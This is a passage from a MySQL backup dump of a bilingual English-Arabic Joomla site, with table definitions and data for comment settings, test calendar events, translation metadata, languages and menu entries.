Adminbss'),('','en-GB','username_maxlength','20'),('','en-GB','comment_minlength','0'),('','en-GB','comment_maxlength','1000'),('','en-GB','show_commentlength','1'),('','en-GB','word_maxlength','15'),('','en-GB','link_maxlength','30'),('','en-GB','flood_time','30'),('','en-GB','enable_nested_quotes','1'),('','en-GB','enable_username_check','1'),('','en-GB','forbidden_names','adminbss,moderator'),('','en-GB','badwords',''),('','en-GB','censor_replace_word','[censored]'),('','en-GB','message_policy_post',''),('','en-GB','message_policy_whocancomment',''),('','en-GB','message_locked','This content has been locked. You can no longer post any comment.'),('','en-GB','enable_captcha',''),('','en-GB','enable_gravatar',''),('','en-GB','enable_categories',''),('','en-GB','emailprotection',''),('','en-GB','enable_comment_maxlength_check',''),('','en-GB','enable_bbcode_code',''),('','en-GB','can_report',''),('','en-GB','smiles',':D laugh.gif\n:lol: lol.gif\n:-) smile.gif\n;-) wink.gif\n8) cool.gif\n:-| normal.gif\n:-* whistling.gif\n:oops: redface.gif\n:sad: sad.gif\n:cry: cry.gif\n:o surprised.gif\n:-? confused.gif\n:-x sick.gif\n:eek: shocked.gif\n:zzz sleeping.gif\n:P tongue.gif\n:roll: rolleyes.gif\n:sigh: unsure.gif'),('','en-GB','merge_time','0'),('','en-GB','enable_geshi','0'); /*!40000 ALTER TABLE `bak_fit_bss_jcomments_settings` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jcomments_subscriptions` -- DROP TABLE IF EXISTS `bak_fit_bss_jcomments_subscriptions`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jcomments_subscriptions` ( `id` int(11) unsigned NOT NULL auto_increment, `object_id` int(11) unsigned NOT NULL default '0', `object_group` varchar(255) NOT NULL default '', `lang` varchar(255) NOT NULL default '', `userid` int(11) unsigned NOT NULL default '0', `name` varchar(255) NOT NULL default '', `email` varchar(255) NOT NULL default '', `hash` varchar(255) NOT NULL default '', `published` tinyint(1) unsigned NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jcomments_subscriptions` -- LOCK TABLES `bak_fit_bss_jcomments_subscriptions` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jcomments_subscriptions` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_jcomments_subscriptions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jcomments_version` -- DROP TABLE IF EXISTS `bak_fit_bss_jcomments_version`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jcomments_version` ( `version` varchar(16) NOT NULL default '', `previous` varchar(16) NOT NULL default '', `installed` datetime NOT NULL default '0000-00-00 00:00:00', `updated` datetime NOT NULL default '0000-00-00 00:00:00', PRIMARY KEY (`version`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jcomments_version` -- LOCK TABLES `bak_fit_bss_jcomments_version` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jcomments_version` DISABLE KEYS */; INSERT INTO `bak_fit_bss_jcomments_version` VALUES ('2.2.0.2','','2011-06-22 13:15:11','0000-00-00 00:00:00'); /*!40000 ALTER TABLE `bak_fit_bss_jcomments_version` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jcomments_votes` -- DROP TABLE IF EXISTS `bak_fit_bss_jcomments_votes`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jcomments_votes` ( `id` int(11) unsigned NOT NULL auto_increment, `commentid` int(11) unsigned NOT NULL default '0', `userid` int(11) unsigned NOT NULL default '0', `ip` varchar(15) NOT NULL default '', `date` datetime NOT NULL default '0000-00-00 00:00:00', `value` tinyint(1) NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jcomments_votes` -- LOCK TABLES `bak_fit_bss_jcomments_votes` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jcomments_votes` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_jcomments_votes` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jev_defaults` -- DROP TABLE IF EXISTS `bak_fit_bss_jev_defaults`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jev_defaults` ( `title` varchar(100) NOT NULL default '', `name` varchar(50) NOT NULL default '', `subject` text NOT NULL, `value` text NOT NULL, `state` tinyint(3) NOT NULL default '1', PRIMARY KEY (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jev_defaults` -- LOCK TABLES `bak_fit_bss_jev_defaults` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jev_defaults` DISABLE KEYS */; INSERT INTO `bak_fit_bss_jev_defaults` VALUES ('Event Detail Page','icalevent.detail_body','','',0); /*!40000 ALTER TABLE `bak_fit_bss_jev_defaults` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jev_users` -- DROP TABLE IF EXISTS `bak_fit_bss_jev_users`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jev_users` ( `id` int(11) unsigned NOT NULL auto_increment, `user_id` int(11) NOT NULL default '0', `published` tinyint(2) NOT NULL default '0', `canuploadimages` tinyint(2) NOT NULL default '0', `canuploadmovies` tinyint(2) NOT NULL default '0', `cancreate` tinyint(2) NOT NULL default '0', `canedit` tinyint(2) NOT NULL default '0', `canpublishown` tinyint(2) NOT NULL default '0', `candeleteown` tinyint(2) NOT NULL default '0', `canpublishall` tinyint(2) NOT NULL default '0', `candeleteall` tinyint(2) NOT NULL default '0', `cancreateown` tinyint(2) NOT NULL default '0', `cancreateglobal` tinyint(2) NOT NULL default '0', `eventslimit` int(11) NOT NULL default '0', `extraslimit` int(11) NOT NULL default '0', `categories` varchar(255) NOT NULL default '', `calendars` varchar(255) NOT NULL default '', `created` datetime NOT NULL default '0000-00-00 00:00:00', PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jev_users` -- LOCK TABLES `bak_fit_bss_jev_users` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jev_users` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_jev_users` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jevents_categories` -- DROP TABLE IF EXISTS `bak_fit_bss_jevents_categories`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jevents_categories` ( `id` int(12) NOT NULL default '0', `color` varchar(8) NOT NULL default '', `admin` int(12) NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jevents_categories` -- LOCK TABLES `bak_fit_bss_jevents_categories` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jevents_categories` DISABLE KEYS */; INSERT INTO `bak_fit_bss_jevents_categories` VALUES (15,'#CCCCFF',0),(53,'#000000',0),(54,'#000000',0); /*!40000 ALTER TABLE `bak_fit_bss_jevents_categories` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jevents_exception` -- DROP TABLE IF EXISTS `bak_fit_bss_jevents_exception`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jevents_exception` ( `ex_id` int(12) NOT NULL auto_increment, `rp_id` int(12) NOT NULL default '0', `eventid` int(12) NOT NULL default '1', `eventdetail_id` int(12) NOT NULL default '0', `exception_type` int(2) NOT NULL default '0', `startrepeat` datetime NOT NULL default '0000-00-00 00:00:00', PRIMARY KEY (`ex_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jevents_exception` -- LOCK TABLES `bak_fit_bss_jevents_exception` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jevents_exception` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_jevents_exception` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jevents_icsfile` -- DROP TABLE IF EXISTS `bak_fit_bss_jevents_icsfile`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jevents_icsfile` ( `ics_id` int(12) NOT NULL auto_increment, `srcURL` varchar(255) NOT NULL default '', `label` varchar(30) NOT NULL default '', `filename` varchar(120) NOT NULL default '', `icaltype` tinyint(3) NOT NULL default '0', `isdefault` tinyint(3) NOT NULL default '0', `ignoreembedcat` tinyint(3) NOT NULL default '0', `state` tinyint(3) NOT NULL default '1', `access` int(11) unsigned NOT NULL default '0', `catid` int(11) NOT NULL default '1', `created` datetime NOT NULL default '0000-00-00 00:00:00', `created_by` int(11) unsigned NOT NULL default '0', `created_by_alias` varchar(100) NOT NULL default '', `modified_by` int(11) unsigned NOT NULL default '0', `refreshed` datetime NOT NULL default '0000-00-00 00:00:00', `autorefresh` tinyint(3) NOT NULL default '0', PRIMARY KEY (`ics_id`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jevents_icsfile` -- LOCK TABLES `bak_fit_bss_jevents_icsfile` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jevents_icsfile` DISABLE KEYS */; INSERT INTO `bak_fit_bss_jevents_icsfile` VALUES (1,'','Default','Initial ICS File',2,1,0,1,0,15,'0000-00-00 00:00:00',0,'',0,'0000-00-00 00:00:00',0); /*!40000 ALTER TABLE `bak_fit_bss_jevents_icsfile` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jevents_repbyday` -- DROP TABLE IF EXISTS `bak_fit_bss_jevents_repbyday`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jevents_repbyday` ( `rptday` date NOT NULL default '0000-00-00', `rp_id` int(12) NOT NULL default '0', `catid` int(11) NOT NULL default '1' ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jevents_repbyday` -- LOCK TABLES `bak_fit_bss_jevents_repbyday` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jevents_repbyday` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_jevents_repbyday` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jevents_repetition` -- DROP TABLE IF EXISTS `bak_fit_bss_jevents_repetition`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jevents_repetition` ( `rp_id` int(12) NOT NULL auto_increment, `eventid` int(12) NOT NULL default '1', `eventdetail_id` int(12) NOT NULL default '0', `duplicatecheck` varchar(32) NOT NULL default '', `startrepeat` datetime NOT NULL default '0000-00-00 00:00:00', `endrepeat` datetime NOT NULL default '0000-00-00 00:00:00', PRIMARY KEY (`rp_id`) ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jevents_repetition` -- LOCK TABLES `bak_fit_bss_jevents_repetition` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jevents_repetition` DISABLE KEYS */; INSERT INTO `bak_fit_bss_jevents_repetition` VALUES (1,1,1,'2d1ca0d7e86476f3936317c0c431e841','2011-11-21 08:00:00','2011-11-21 17:00:00'),(2,2,2,'cc9a97c741e55876f2d2a514a413f299','2011-11-21 08:00:00','2011-12-06 17:00:00'); /*!40000 ALTER TABLE `bak_fit_bss_jevents_repetition` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jevents_rrule` -- DROP TABLE IF EXISTS `bak_fit_bss_jevents_rrule`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jevents_rrule` ( `rr_id` int(12) NOT NULL auto_increment, `eventid` int(12) NOT NULL default '1', `freq` varchar(30) NOT NULL default '', `until` int(12) NOT NULL default '1', `untilraw` varchar(30) NOT NULL default '', `count` int(6) NOT NULL default '1', `rinterval` int(6) NOT NULL default '1', `bysecond` varchar(50) NOT NULL default '', `byminute` varchar(50) NOT NULL default '', `byhour` varchar(50) NOT NULL default '', `byday` varchar(50) NOT NULL default '', `bymonthday` varchar(50) NOT NULL default '', `byyearday` varchar(50) NOT NULL default '', `byweekno` varchar(50) NOT NULL default '', `bymonth` varchar(50) NOT NULL default '', `bysetpos` varchar(50) NOT NULL default '', `wkst` varchar(50) NOT NULL default '', PRIMARY KEY (`rr_id`) ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jevents_rrule` -- LOCK TABLES `bak_fit_bss_jevents_rrule` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jevents_rrule` DISABLE KEYS */; INSERT INTO `bak_fit_bss_jevents_rrule` VALUES (1,1,'none',0,'',1,1,'','','','+1MO,+2MO,+3MO,+4MO,+5MO','','','','','',''),(2,2,'none',0,'',1,1,'','','','+1MO,+2MO,+3MO,+4MO,+5MO','','','','','',''); /*!40000 ALTER TABLE `bak_fit_bss_jevents_rrule` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jevents_vevdetail` -- DROP TABLE IF EXISTS `bak_fit_bss_jevents_vevdetail`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jevents_vevdetail` ( `evdet_id` int(12) NOT NULL auto_increment, `rawdata` longtext NOT NULL, `dtstart` int(11) NOT NULL default '0', `dtstartraw` varchar(30) NOT NULL default '', `duration` int(11) NOT NULL default '0', `durationraw` varchar(30) NOT NULL default '', `dtend` int(11) NOT NULL default '0', `dtendraw` varchar(30) NOT NULL default '', `dtstamp` varchar(30) NOT NULL default '', `class` varchar(10) NOT NULL default '', `categories` varchar(120) NOT NULL default '', `color` varchar(20) NOT NULL default '', `description` longtext NOT NULL, `geolon` float NOT NULL default '0', `geolat` float NOT NULL default '0', `location` varchar(120) NOT NULL default '', `priority` tinyint(3) unsigned NOT NULL default '0', `status` varchar(20) NOT NULL default '', `summary` longtext NOT NULL, `contact` varchar(120) NOT NULL default '', `organizer` varchar(120) NOT NULL default '', `url` varchar(120) NOT NULL default '', `extra_info` varchar(240) NOT NULL default '', `created` varchar(30) NOT NULL default '', `sequence` int(11) NOT NULL default '1', `state` tinyint(3) NOT NULL default '1', `multiday` tinyint(3) NOT NULL default '1', `hits` int(11) NOT NULL default '0', `noendtime` tinyint(3) NOT NULL default '0', PRIMARY KEY (`evdet_id`), FULLTEXT KEY `searchIdx` (`summary`,`description`) ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jevents_vevdetail` -- LOCK TABLES `bak_fit_bss_jevents_vevdetail` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jevents_vevdetail` DISABLE KEYS */; INSERT INTO `bak_fit_bss_jevents_vevdetail` VALUES (1,'',1321855200,'',0,'',1321887600,'','','','','','test data for Event Calendar',0,0,'amman',0,'','Event Calendar test','','','','','',0,1,1,12,0),(2,'',1321855200,'',0,'',1323183600,'','','','','',' أجندة النشاطات تجريبي<br />',0,0,'عمان',0,'','أجندة النشاطات','','','','','',0,1,1,6,0); /*!40000 ALTER TABLE `bak_fit_bss_jevents_vevdetail` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jevents_vevent` -- DROP TABLE IF EXISTS `bak_fit_bss_jevents_vevent`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jevents_vevent` ( `ev_id` int(12) NOT NULL auto_increment, `icsid` int(12) NOT NULL default '0', `catid` int(11) NOT NULL default '1', `uid` varchar(255) NOT NULL default '', `refreshed` datetime NOT NULL default '0000-00-00 00:00:00', `created` datetime NOT NULL default '0000-00-00 00:00:00', `created_by` int(11) unsigned NOT NULL default '0', `created_by_alias` varchar(100) NOT NULL default '', `modified_by` int(11) unsigned NOT NULL default '0', `rawdata` longtext NOT NULL, `recurrence_id` varchar(30) NOT NULL default '', `detail_id` int(12) NOT NULL default '0', `state` tinyint(3) NOT NULL default '1', `access` int(11) unsigned NOT NULL default '0', PRIMARY KEY (`ev_id`) ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jevents_vevent` -- LOCK TABLES `bak_fit_bss_jevents_vevent` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jevents_vevent` DISABLE KEYS */; INSERT INTO `bak_fit_bss_jevents_vevent` VALUES (1,1,54,'ce919ab54ba9b96f83e57059b93357c9','0000-00-00 00:00:00','2011-11-21 14:07:33',62,'',62,'a:16:{s:3:\"UID\";s:32:\"ce919ab54ba9b96f83e57059b93357c9\";s:11:\"X-EXTRAINFO\";s:0:\"\";s:8:\"LOCATION\";s:5:\"amman\";s:11:\"allDayEvent\";s:3:\"off\";s:7:\"CONTACT\";s:0:\"\";s:11:\"DESCRIPTION\";s:29:\"test data for Event Calendar\";s:12:\"publish_down\";s:10:\"2011-11-21\";s:10:\"publish_up\";s:10:\"2011-11-21\";s:7:\"SUMMARY\";s:19:\"Event Calendar test\";s:11:\"X-CREATEDBY\";i:62;s:7:\"DTSTART\";i:1321855200;s:5:\"DTEND\";i:1321887600;s:5:\"RRULE\";a:4:{s:4:\"FREQ\";s:4:\"none\";s:5:\"COUNT\";i:1;s:8:\"INTERVAL\";s:1:\"1\";s:5:\"BYDAY\";s:24:\"+1MO,+2MO,+3MO,+4MO,+5MO\";}s:8:\"MULTIDAY\";s:1:\"1\";s:9:\"NOENDTIME\";s:1:\"0\";s:7:\"X-COLOR\";s:0:\"\";}','',1,1,0),(2,1,53,'8d11ac99db9edd7f8c8eea13372a9f12','0000-00-00 00:00:00','2011-11-21 14:09:03',62,'',62,'a:16:{s:3:\"UID\";s:32:\"8d11ac99db9edd7f8c8eea13372a9f12\";s:11:\"X-EXTRAINFO\";s:0:\"\";s:8:\"LOCATION\";s:8:\"عمان\";s:11:\"allDayEvent\";s:3:\"off\";s:7:\"CONTACT\";s:0:\"\";s:11:\"DESCRIPTION\";s:50:\" أجندة النشاطات تجريبي<br />\";s:12:\"publish_down\";s:10:\"2011-12-06\";s:10:\"publish_up\";s:10:\"2011-11-21\";s:7:\"SUMMARY\";s:27:\"أجندة النشاطات\";s:11:\"X-CREATEDBY\";i:62;s:7:\"DTSTART\";i:1321855200;s:5:\"DTEND\";i:1323183600;s:5:\"RRULE\";a:4:{s:4:\"FREQ\";s:4:\"none\";s:5:\"COUNT\";i:1;s:8:\"INTERVAL\";s:1:\"1\";s:5:\"BYDAY\";s:24:\"+1MO,+2MO,+3MO,+4MO,+5MO\";}s:8:\"MULTIDAY\";s:1:\"1\";s:9:\"NOENDTIME\";s:1:\"0\";s:7:\"X-COLOR\";s:0:\"\";}','',2,1,0); /*!40000 ALTER TABLE `bak_fit_bss_jevents_vevent` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jf_content` -- DROP TABLE IF EXISTS `bak_fit_bss_jf_content`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jf_content` ( `id` int(10) unsigned NOT NULL auto_increment, `language_id` int(11) NOT NULL default '0', `reference_id` int(11) NOT NULL default '0', `reference_table` varchar(100) NOT NULL default '', `reference_field` varchar(100) NOT NULL default '', `value` mediumtext NOT NULL, `original_value` varchar(255) default NULL, `original_text` mediumtext NOT NULL, `modified` datetime NOT NULL default '0000-00-00 00:00:00', `modified_by` int(11) unsigned NOT NULL default '0', `published` tinyint(1) unsigned NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=990 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jf_content` -- LOCK TABLES `bak_fit_bss_jf_content` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jf_content` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_jf_content` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jf_tableinfo` -- DROP TABLE IF EXISTS `bak_fit_bss_jf_tableinfo`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jf_tableinfo` ( `id` int(11) NOT NULL auto_increment, `joomlatablename` varchar(100) NOT NULL default '', `tablepkID` varchar(100) NOT NULL default '', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=18343 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jf_tableinfo` -- LOCK TABLES `bak_fit_bss_jf_tableinfo` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jf_tableinfo` DISABLE KEYS */; INSERT INTO `bak_fit_bss_jf_tableinfo` VALUES (18323,'banner','bid'),(18324,'bannerclient','cid'),(18325,'categories','id'),(18326,'contact_details','id'),(18327,'content','id'),(18328,'k2_attachments','id'),(18329,'k2_categories','id'),(18330,'k2_extra_fields','id'),(18331,'k2_items','id'),(18332,'k2_tags','id'),(18333,'k2_users','id'),(18334,'languages','id'),(18335,'menu','id'),(18336,'modules','id'),(18337,'newsfeeds','id'),(18338,'poll_data','id'),(18339,'polls','id'),(18340,'sections','id'),(18341,'users','id'),(18342,'weblinks','id'); /*!40000 ALTER TABLE `bak_fit_bss_jf_tableinfo` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_languages` -- DROP TABLE IF EXISTS `bak_fit_bss_languages`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_languages` ( `id` int(11) NOT NULL auto_increment, `name` varchar(100) NOT NULL default '', `active` tinyint(1) NOT NULL default '0', `iso` varchar(20) default NULL, `code` varchar(20) NOT NULL default '', `shortcode` varchar(20) default NULL, `image` varchar(100) default NULL, `fallback_code` varchar(20) NOT NULL default '', `params` text NOT NULL, `ordering` int(11) NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_languages` -- LOCK TABLES `bak_fit_bss_languages` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_languages` DISABLE KEYS */; INSERT INTO `bak_fit_bss_languages` VALUES (1,'English (United Kingdom)',1,'en_GB.utf8, en_GB.UT','en-GB','en','','','',1),(2,'عـربـي',1,'ar_AR.utf8, ar_AR.UT','ar-AA','ar','','','',0); /*!40000 ALTER TABLE `bak_fit_bss_languages` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_menu` -- DROP TABLE IF EXISTS `bak_fit_bss_menu`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_menu` ( `id` int(11) NOT NULL auto_increment, `menutype` varchar(75) default NULL, `name` varchar(255) default NULL, `alias` varchar(255) NOT NULL default '', `link` text, `type` varchar(50) NOT NULL default '', `published` tinyint(1) NOT NULL default '0', `parent` int(11) unsigned NOT NULL default '0', `componentid` int(11) unsigned NOT NULL default '0', `sublevel` int(11) default '0', `ordering` int(11) default '0', `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `pollid` int(11) NOT NULL default '0', `browserNav` tinyint(4) default '0', `access` tinyint(3) unsigned NOT NULL default '0', `utaccess` tinyint(3) unsigned NOT NULL default '0', `params` text NOT NULL, `lft` int(11) unsigned NOT NULL default '0', `rgt` int(11) unsigned NOT NULL default '0', `home` int(1) unsigned NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=159 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_menu` -- LOCK TABLES `bak_fit_bss_menu` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_menu` DISABLE KEYS */; INSERT INTO `bak_fit_bss_menu` VALUES (1,'mainmenu','HOME','home','index.php?option=com_content&view=frontpage','component',1,0,20,0,4,0,'0000-00-00 00:00:00',0,0,0,3,'num_leading_articles=0\nnum_intro_articles=4\nnum_columns=1\nnum_links=4\norderby_pri=\norderby_sec=front\nmulti_column_order=1\nshow_pagination=2\nshow_pagination_results=1\nshow_feed_link=1\nshow_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,1),(152,'unused','general top article sub about us','general-top-article','index.php?option=com_content&view=article&id=281','component',1,0,20,0,3,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(150,'unused','WHO ARE WE','who-are-we','index.php?option=com_content&view=article&id=284','component',1,0,20,0,2,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(149,'unused','general top article sub home','general-top-article','index.php?option=com_content&view=article&id=281','component',1,0,20,0,1,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(147,'mainmenu','SOLUTIONS','solutions','index.php?option=com_content&view=frontpage','component',-2,0,20,0,3,0,'0000-00-00 00:00:00',0,0,0,0,'num_leading_articles=1\nnum_intro_articles=4\nnum_columns=2\nnum_links=4\norderby_pri=\norderby_sec=front\nmulti_column_order=1\nshow_pagination=2\nshow_pagination_results=1\nshow_feed_link=1\nshow_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(143,'mainmenu','ABOUT US','about-us','index.php?option=com_content&view=article&id=290','component',1,0,20,0,5,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=1\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(151,'mainmenu','WHO ARE WE','who-are-we','index.php?option=com_content&view=article&id=285','component',0,143,20,1,1,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(144,'mainmenu','PRODUCTS','products','index.php?option=com_content&view=category&id=65','component',1,0,20,0,6,62,'2012-03-21 